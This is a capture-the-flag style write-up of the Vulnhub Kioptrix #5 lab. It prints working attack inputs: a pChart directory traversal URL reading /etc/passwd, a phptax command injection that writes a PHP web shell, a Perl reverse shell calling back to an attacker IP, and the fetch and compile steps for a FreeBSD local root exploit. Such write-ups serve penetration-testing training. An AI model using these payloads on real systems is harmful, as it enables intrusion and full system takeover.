Vulnhub - Kioptrix #5 Writeup

7 minute read

Description

Vulnhub - Kioptrix #5

As usual, this vulnerable machine is targeted at the beginner. It’s not meant for the seasoned pentester or security geek that’s been at this sort of stuff for 10 years. Everyone needs a place to start and all I want to do is help in that regard.

Also, before powering on the VM I suggest you remove the network card and re-add it. For some oddball reason it doesn’t get its IP (well I do kinda know why but don’t want to give any details away). So just add the VM to your virtualization software, remove and then add a network card. Set it to bridge mode and you should be good to go.

This was created using ESX 5.0 and tested on Fusion, but shouldn’t be much of a problem on other platforms.

Enumeration

Add kioptrix5.com to hosts file and start with Nmap

Nmap

Nmap scan report for kioptrix5.com (192.168.174.7)
Host is up, received arp-response (0.00078s latency).
rDNS record for 192.168.174.7: www.kioptrix5.com
Scanned at 2020-02-12 03:35:49 EST for 35s
Not shown: 997 filtered ports
Reason: 997 no-responses
PORT     STATE  SERVICE REASON         VERSION
22/tcp   closed ssh     reset ttl 64
80/tcp   open   http    syn-ack ttl 64 Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    syn-ack ttl 64 Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
| http-methods: 
|_  Supported Methods: HEAD
MAC Address: 08:00:27:5E:CC:7D (Oracle VirtualBox virtual NIC)

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 12 03:36:24 2020 -- 1 IP address (1 host up) scanned in 36.11 seconds

Hmm no ssh?

We have a web server on port 80 and a web server at port 8080. The index file served on port 80, contains the following.

<html>
 <head>
  <!--
  <META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">
  -->
 </head>

 <body>
  <h1>It works!</h1>
 </body>
</html>

Webport on 8080 returns a forbidden error. We will look into that later.

Look like its using a php application named pchart

Searchsploit

A quick search using searchsploit showed a directory traversal vulnerability.

searchsploit pchart
--------------------------------------------------------------------------------------------------------------
 Exploit Title      
---------------------------------------------------------------------------------------------------------------
pChart 2.1.3 - Multiple Vulnerabilities                   | exploits/php/webapps/31173.txt
---------------------------------------------------------------------------------------------------------------
Shellcodes: No Result

Essentially we can access any file that the web server has access to, using the following url

 http://kioptrix5.com/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

image1

We have access to so many important linux files. But which file can give us information to pop a shell?. After poking around for a long time I couldn’t find anything good enough and I had to look online for some hints.

Lets check why we can’t access port 8080 by looking at the httpd.conf

http://kioptrix5.com/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

Contents of httpd.conf

---output snipped---

<VirtualHost *:8080>
    DocumentRoot /usr/local/www/apache22/data2

<Directory "/usr/local/www/apache22/data2">
    Options Indexes FollowSymLinks
    AllowOverride All
    Order allow,deny
    Allow from env=Mozilla4_browser
</Directory>



</VirtualHost>

We can see that the web server is only allowing requests when the user agent is Mozilla4_browser.

Firefox Extension User-Agent Switcher and Manager

We can set custom user agent using a firefox extension. After setting it to Mozilla4_browser we can see a link to a php application named phptax.

image1

Searchsploit

kali@kali:~/Desktop/vulnhub/kioptrix5$ searchsploit phptax
-----------------------------------------------------------------------
 Exploit Title       
 -----------------------------------------------------------------------
PhpTax - 'pfilez' Execution Remote Code Injection (Metasploit)       | exploits/php/webapps/21833.rb
PhpTax 0.8 - File Manipulation 'newvalue' / Remote Code Execution    | exploits/php/webapps/25849.txt
phptax 0.8 - Remote Code Execution                                   | exploits/php/webapps/21665.txt
------------------------------------------------------------------------
Shellcodes: No Result

And we have some RCE for this application. Lets try using it without metasploit

Low Shell

Understanding phptax RCE

From exploit-db phptax RCE

include ("./files/$_GET[pfilez]");

// makes a png image
$pfilef=str_replace(".tob",".png",$_GET[pfilez]);
$pfilep=str_replace(".tob",".pdf",$_GET[pfilez]);
Header("Content-type: image/png");
if ($_GET[pdf] == "") Imagepng($image);
if ($_GET[pdf] == "make") Imagepng($image,"./data/pdf/$pfilef");
if ($_GET[pdf] == "make") exec("convert ./data/pdf/$pfilef ./data/pdf/$pfilep");

There is no input validation. If we set the value of pdf keyword as make we can execute any arbitrary command by appending a ; before the command.

The first thing I did was to create a simple php web shell using the following.

kioptrix5.com:8080/phptax/drawimage.php?pfilez=xxx;echo '<?php passthru($_GET[cmd]);?>' > testshell.php&pdf=make

URL Encoded

kioptrix5.com:8080/phptax/drawimage.php?pfilez=xxx;echo%20%27%3C%3Fphp%20passthru(%24_GET[cmd])%3B%3F%3E%27%20%3E%20testshell.php&pdf=make

Now we have a web shell that can execute commands using the cmd parameter.

image1

After running some commands I found that the system has nc and perl. But for some reason the nc cannot use the -e flag that can give us a reverse shell. So lets get a reverse shell using perl

A Shell Drop Issue

I was facing an issue while I was using perl or telnet commands to execute a reverse shell. The system establishes a connection and immediately drops it. It was driving me crazy. Then I remembered a technique that was used when executing shell code to prevent the shell from dropping. It was done by appending a cat - at the end of the shellcode. When I tried the same thing here it worked. I don’t remember why it worked that way. But we have to append cat - at the end of the reverse shell code or the system immediately drops the connection.

Perl Reverse Shell

kioptrix5.com:8080/phptax/drawimage.php?pfilez=xxx;perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.63.3:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};' | cat -&pdf=make

You might have to url encode it.

kali@kali:~/Desktop/tools$ nc -lvp 4444
listening on [any] 4444 ...
connect to [192.168.63.3] from www.kioptrix5.com [192.168.63.4] 26454
id
uid=80(www) gid=80(www) groups=80(www)

Root Shell

Root is straight forward. There is a FreeBSD 9.0 < 9.1 - ‘mmap/ptrace’ Local Privilege Escalation available. I copied it to the system using ftp. Compile it with gcc and run to become root

Start a ftp server using python. You might have to run sudo pip3 install pyftpdlib

kali@kali:~/Desktop/vulnhub/kioptrix5$ sudo python3 -m pyftpdlib -p 21
[I 2020-02-14 04:51:53] >>> starting FTP server on 0.0.0.0:21, pid=6268 <<<
[I 2020-02-14 04:51:53] concurrency model: async
[I 2020-02-14 04:51:53] masquerade (NAT) address: None
[I 2020-02-14 04:51:53] passive ports: None
[I 2020-02-14 04:52:03] 192.168.63.4:32644-[] FTP session opened (connect)
[I 2020-02-14 04:52:12] 192.168.63.4:32644-[anonymous] USER 'anonymous' logged in.
[I 2020-02-14 04:52:16] 192.168.63.4:32644-[anonymous] RETR /home/kali/Desktop/vulnhub/kioptrix5/exploit.c completed=1
[I 2020-02-14 04:52:18] 192.168.63.4:32644-[anonymous] FTP session closed (disconnect).

Login as anonymous with any password and copy the exploit.

$ ftp 192.168.63.3
anonymous
Password: aa
Name (192.168.63.3:root): get exploit.c
exit
$ gcc exploit.c
$ ./a.out
id
uid=0(root) gid=0(wheel) egid=80(www) groups=80(www)
cd /root
cat congrats.txt
If you are reading this, it means you got root (or cheated).
Congratulations either way...

Hope you enjoyed this new VM of mine. As always, they are made for the beginner in 
mind, and not meant for the seasoned pentester. However this does not mean one 
can't enjoy them.

As with all my VMs, besides getting "root" on the system, the goal is to also
learn the basics skills needed to compromise a system. Most importantly, in my mind,
are information gathering & research. Anyone can throw massive amounts of exploits
and "hope" it works, but think about the traffic.. the logs... Best to take it
slow, and read up on the information you gathered and hopefully craft better
more targetted attacks. 

For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly.
Knowing the OS gives you any idea of what will work and what won't from the get go.
Default file locations are not the same on FreeBSD versus a Linux based distribution.
Apache logs aren't in "/var/log/apache/access.log", but in "/var/log/httpd-access.log".
It's default document root is not "/var/www/" but in "/usr/local/www/apache22/data".
Finding and knowing these little details will greatly help during an attack. Of course
my examples are specific for this target, but the theory applies to all systems.

As a small exercise, look at the logs and see how much noise you generated. Of course
the log results may not be accurate if you created a snapshot and reverted, but at least
it will give you an idea. For fun, I installed "OSSEC-HIDS" and monitored a few things.
Default settings, nothing fancy but it should've logged a few of your attacks. Look
at the following files:
/root/folderMonitor.log
/root/httpd-access.log (softlink)
/root/ossec-alerts.log (softlink)

The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified
files in 2 specific folders. Since FreeBSD doesn't support "iNotify", I couldn't use OSSEC-HIDS 
for this.
The httpd-access.log is rather self-explanatory .
Lastly, the ossec-alerts.log file is OSSEC-HIDS is where it puts alerts when monitoring certain
files. This one should've detected a few of your web attacks.

Feel free to explore the system and other log files to see how noisy, or silent, you were.
And again, thank you for taking the time to download and play.
Sincerely hope you enjoyed yourself.

Be good...


loneferret
http://www.kioptrix.com


p.s.: Keep in mind, for each "web attack" detected by OSSEC-HIDS, by
default it would've blocked your IP (both in hosts.allow & Firewall) for
600 seconds. I was nice enough to remove that part :)

And we are root!..

Tags:

Categories:

Updated: